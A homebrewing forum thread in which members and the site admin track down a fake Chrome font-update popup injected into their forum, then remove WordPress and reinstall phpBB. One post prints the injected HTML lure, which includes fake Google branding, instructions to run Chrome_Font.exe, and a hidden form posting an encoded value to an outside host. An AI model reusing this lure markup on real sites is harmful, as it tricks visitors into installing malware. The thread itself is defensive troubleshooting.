Attack / Virus

A spot to talk website specific issues
Post Reply
User avatar
RubberToe
Award Winner 13
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth
Contact:

Attack / Virus

Post by RubberToe » Tue Mar 14, 2017 10:23 am

Hey everyone,

A user has reported something suspicious, and it's an attack directed at Google Chrome users from what I can tell.

If you see any page asking you to install a missing font, DO NOT DO IT.

If anyone sees this popup / error / page, please let me know as I haven't tracked down how the attacker is doing this.

If it's one post or topic, please let me know which. Perhaps it's just something embedded in a post text.

Thanks,
-Rob
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

User avatar
GAM
Verified User
Verified User
Posts: 5402
Joined: Wed May 18, 2011 2:50 pm
Name: Sandy MacNeil
Location: North End HFX

Re: Attack / Virus

Post by GAM » Tue Mar 14, 2017 10:27 am

Lots of it going around.

Thanks Rob.

S

User avatar
jacinthebox
Award Winner 16
Award Winner 16
Posts: 3047
Joined: Tue Oct 16, 2012 12:44 pm
Name: Justin
Location: Hubley
Contact:

Re: Attack / Virus

Post by jacinthebox » Tue Mar 14, 2017 10:37 am

yeah its a fake font install...only an issue for chrome users
Brathair Brewing



Brew Hard...Stay Humble

User avatar
RubberToe
Award Winner 13
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth
Contact:

Re: Attack / Virus

Post by RubberToe » Tue Mar 14, 2017 10:45 am

I can't reproduce it with Chrome on Linux. Can someone on Windows try? You may need to come from Google search, so searching for "site:brewnosers.org brewing" might lead you to it.

Maybe it's just some specific topics with some embedded image / javascript somehow. I need to find it to kill it.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

User avatar
jacinthebox
Award Winner 16
Award Winner 16
Posts: 3047
Joined: Tue Oct 16, 2012 12:44 pm
Name: Justin
Location: Hubley
Contact:

Re: Attack / Virus

Post by jacinthebox » Tue Mar 14, 2017 11:15 am

I had it on my home PC.

I resolved it but going to settings/advanced settings/reset settings.

it went away

https://malwaretips.com/blogs/remove-ch ... exe-virus/

bottom of the page...malware software didn't pick up on anything...maybe because i didn't click install on the virus popup
Brathair Brewing



Brew Hard...Stay Humble

User avatar
LeafMan66_67
Award Winner 2
Award Winner 2
Posts: 4596
Joined: Fri Mar 02, 2012 7:10 am
Name: Derek Stapleton
Location: Lower Sackville, NS

Re: Attack / Virus

Post by LeafMan66_67 » Tue Mar 14, 2017 12:34 pm

Definitely there if you link to the site via a Windows Google Search "site:brewnosers.org brewing". First two forum links give you the attached screen:
You do not have the required permissions to view the files attached to this post.
"He was a wise man who invented beer." - Plato

User avatar
RubberToe
Award Winner 13
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth
Contact:

Re: Attack / Virus

Post by RubberToe » Tue Mar 14, 2017 12:47 pm

While on that page, can you view source and see Hoefler anywhere in the text? I can't. But perhaps it's only in the initial load from Google.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

User avatar
LeafMan66_67
Award Winner 2
Award Winner 2
Posts: 4596
Joined: Fri Mar 02, 2012 7:10 am
Name: Derek Stapleton
Location: Lower Sackville, NS

Re: Attack / Virus

Post by LeafMan66_67 » Tue Mar 14, 2017 1:15 pm

RubberToe wrote:While on that page, can you view source and see Hoefler anywhere in the text? I can't. But perhaps it's only in the initial load from Google.
Can no longer get it to pop up.
"He was a wise man who invented beer." - Plato

User avatar
RubberToe
Award Winner 13
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth
Contact:

Re: Attack / Virus

Post by RubberToe » Tue Mar 14, 2017 1:23 pm

Odd. If you can get it to happen again please update.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

User avatar
RubberToe
Award Winner 13
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth
Contact:

Re: Attack / Virus

Post by RubberToe » Tue Mar 14, 2017 1:55 pm

Wordpress was highly suspect so I removed it. It's still puzzling but it was at the top level of the site. Looking through it's files there was something fishy as well. Wordpress has been a common attack vector for a long time, we don't maintain ours. Therefore I figure it's a liability so I removed it.

If anyone wants to replace the main web page I'm open to suggestions.

If anyone can reproduce this Chrome font thing I would like to know.

Thanks,
-Rob
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

MarkPower
Award Winner 1
Award Winner 1
Posts: 43
Joined: Fri Jan 13, 2012 4:15 pm
Name: Mark Power
Location: Elmsdale, NS

Re: Attack / Virus

Post by MarkPower » Tue Mar 14, 2017 3:10 pm

Hey Rob,

I can reproduce by doing a google search for "site:brewnosers.org brewing" Any forum link i click will cause the font thing to open. If i view source it does have Hoefler in the text

Code: Select all

<div id="dm-overlay"><div id="dm-table"><div id="dm-cell"><div id="dm-modal"><div id="dm-table"><a href="javascript:void(0)" onclick="document.getElementById('dm-overlay').style.display = 'none'; setTimeout(dy0,1000);" id="cl0se"></a><img id="l0gos" alt='' /><p id="pphh" >The "HoeflerText" font wasn't found.</p></div><div id="odiv9"><p id="info1" >The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".</p><p id="info2" style="display:none;">Step 1: In the bottom left corner of the screen you'll see the download bar. <b id="bbb1">Click on the Chrome_Font.exe</b> item.<br id="brbr1" />Step 2: Press <b id="bbb1">Yes(Run)</b> in order to see the correct content on the web page.</p><div id="divtabl"><table id="tabl1"><tbody id="tbody1"><tr id="trtr1"><td id="tdtd1">Manufacturer:</td><td id="tdtd1">Google Inc. All Rights Reserved</td></tr><tr id="trtr1"><td id="tdtd1">Current version:</td><td id="tdtd1">Chrome Font Pack <b id="bbb2">53.0.2785.89</b></td></tr><tr id="trtr1"><td id="tdtd1">Latest version:</td><td id="tdtd1">Chrome Font Pack <b id="bbb2">57.2.5284.21</b></td></tr></tbody></table><div id="helpimg"><img id="inf0s" alt='' /></div></div><form action="http://www.ibdaa.edu.sa/main.php" method="post" id="form_1d"><input type='hidden' name='infol' value='1ruQABqyXM4ZJccx2UKWo1SbGco0MV3G1PY+pCWlGtqGo1CKYt0=' /></form><div id="upe0" onclick="ue0()" ><a href="javascript:void(0)" id="b00tn">Update</a></div></div></div></div></div><div id="popup-container" class="popup-window gc" style="display:none;"><div class="bigarrow element-animation"></div></div></div>
<script>
Im using Windows 10 and chrome Version 56.0.2924.87

MarkPower
Award Winner 1
Award Winner 1
Posts: 43
Joined: Fri Jan 13, 2012 4:15 pm
Name: Mark Power
Location: Elmsdale, NS

Re: Attack / Virus

Post by MarkPower » Tue Mar 14, 2017 3:14 pm

Update: I was able to reproduce this several times in a row before replying, but while checking what version of Chrome i had, it initiated an update. Now it is on Version 57.0.2987.98 and I am no longer able to reproduce it, and the source no longer has the above snipped i posted.

User avatar
RubberToe
Award Winner 13
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth
Contact:

Re: Attack / Virus

Post by RubberToe » Tue Mar 14, 2017 3:20 pm

Thanks for the info, Mark!
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

User avatar
jimboh
Verified User
Verified User
Posts: 326
Joined: Tue Dec 13, 2016 1:46 pm
Name: jim
Location: Jeddore NS

Re: Attack / Virus

Post by jimboh » Thu Mar 16, 2017 4:37 pm

I used chrome to access the site for the first time today, had been using firefox. Got the virus warning. Tried to view source but the popup no longer appears.
Drinking: Best Coast IPA, Old Speckled Hen Clone, Northern Lights (NG),
Belgian Saison, Blonde Ale, Toy Soldier Stout(OBK) and 14G batch of ESB.
Fermenting: Taking a rest!
Scheduled: Another 10G of Toy Soldier Stout.

User avatar
jimboh
Verified User
Verified User
Posts: 326
Joined: Tue Dec 13, 2016 1:46 pm
Name: jim
Location: Jeddore NS

Re: Attack / Virus

Post by jimboh » Thu Mar 16, 2017 11:48 pm

Hi I am using a different computer and visited the site using chrome and got the virus. I saved the source for the whole page if its any use to you. Let me know if you want me to upload the txt file as an attachment or email it?
I got there by typing brewnosers in search and it was the first.
The google link is https://www.google.ca/url?sa=t&rct=j&q= ... OVt7nYTYfw" onclick="window.open(this.href);return false;

I believe its cached so it may be a problem you no longer have. Don't know if you can request google to refetch the page due to this issue
Drinking: Best Coast IPA, Old Speckled Hen Clone, Northern Lights (NG),
Belgian Saison, Blonde Ale, Toy Soldier Stout(OBK) and 14G batch of ESB.
Fermenting: Taking a rest!
Scheduled: Another 10G of Toy Soldier Stout.

User avatar
RubberToe
Award Winner 13
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth
Contact:

Re: Attack / Virus

Post by RubberToe » Sat Mar 18, 2017 1:21 pm

Thanks.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

User avatar
danlatimer
Verified User
Verified User
Posts: 275
Joined: Sun Apr 26, 2015 9:45 pm
Name: Daniel N Latimer

Re: Attack / Virus

Post by danlatimer » Thu Mar 23, 2017 4:34 pm

It just happened to me again.

This is the culprit: https://malwaretips.com/blogs/remove-ch ... exe-virus/" onclick="window.open(this.href);return false;

Here's a forum post about server admins talking about trying to get rid of it. They apparently eventually did but they didn't post how they did it:S http://forum.odroid.com/viewtopic.php?t=25568" onclick="window.open(this.href);return false;

After 5 minutes or so it stopped happening again. Probably a strategy to prevent it from being fixed.

Here are a few pictures of it happening

Image
Image

User avatar
RubberToe
Award Winner 13
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth
Contact:

Re: Attack / Virus

Post by RubberToe » Thu Mar 23, 2017 6:39 pm

Thanks, I'm digging again.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

User avatar
RubberToe
Award Winner 13
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth
Contact:

Re: Attack / Virus

Post by RubberToe » Thu Mar 23, 2017 6:43 pm

Screw this, I'm installing a fresh copy of PHPBB. Here goes... don't worry, I have lots of backups. :)
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

User avatar
RubberToe
Award Winner 13
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth
Contact:

Re: Attack / Virus

Post by RubberToe » Thu Mar 23, 2017 7:45 pm

The site has been upgraded. Now I have to fix the style. And new tapatalk!
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

Post Reply

Return to “Site Discussion”

Who is online

Users browsing this forum: Magpie [Bot] and 13 guests